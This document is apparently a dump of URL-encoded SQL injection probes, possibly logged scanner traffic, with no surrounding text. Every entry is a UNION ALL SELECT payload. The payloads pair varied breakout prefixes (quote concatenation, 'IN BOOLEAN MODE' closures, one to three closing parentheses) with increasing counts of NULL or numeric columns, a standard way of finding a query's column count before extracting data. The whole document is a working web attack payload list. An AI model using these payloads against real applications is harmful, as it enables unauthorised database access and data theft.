-6797%27%2B%28SELECT%20gJso%20WHERE%209616%3D9616%20UNION%20ALL%20SELECT%209616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616%2C9616--%20 -9380%27%2B%28SELECT%20eucW%20WHERE%209360%3D9360%20UNION%20ALL%20SELECT%209360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360%2C9360--%20 -1075%27%2B%28SELECT%20yDfh%20WHERE%206911%3D6911%20UNION%20ALL%20SELECT%206911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911--%20 -2150%27%2B%28SELECT%20%27Oobp%27%20WHERE%205108%3D5108%20UNION%20ALL%20SELECT%205108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108--%20 -9415%27%2B%28SELECT%20%27McSO%27%20WHERE%206449%3D6449%20UNION%20ALL%20SELECT%206449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449%2C6449--%20 -2346%27%2B%28SELECT%20%27LOCr%27%20WHERE%203802%3D3802%20UNION%20ALL%20SELECT%203802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802--%20 -4141%27%2B%28SELECT%20%27ELAl%27%20WHERE%203065%3D3065%20UNION%20ALL%20SELECT%203065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065--%20 -7106%27%2B%28SELECT%20%27sHXc%27%20WHERE%205296%3D5296%20UNION%20ALL%20SELECT%205296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296--%20 -7736%27%2B%28SELECT%20%27ThFe%27%20WHERE%207048%3D7048%20UNION%20ALL%20SELECT%207048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048--%20 -3719%27%2B%28SELECT%20%27eoqN%27%20WHERE%202852%3D2852%20UNION%20ALL%20SELECT%202852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852%2C2852--%20 -2405%27%2B%28SELECT%20%27gbSs%27%20WHERE%208596%3D8596%20UNION%20ALL%20SELECT%208596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596%2C8596--%20 -6201%27%2B%28SELECT%20%27szzq%27%20WHERE%205754%3D5754%20UNION%20ALL%20SELECT%205754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754%2C5754--%20 -5221%27%2B%28SELECT%20%27SZQF%27%20WHERE%204195%3D4195%20UNION%20ALL%20SELECT%204195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195--%20 -8178%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605--%20 -8898%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690--%20 -9078%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413%2C3413--%20 -2645%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816%2C3816--%20 -1524%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071%2C5071--%20 -5140%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203--%20 -8275%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786%2C4786--%20 -4238%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666--%20 -8927%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297%2C2297--%20 -5257%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 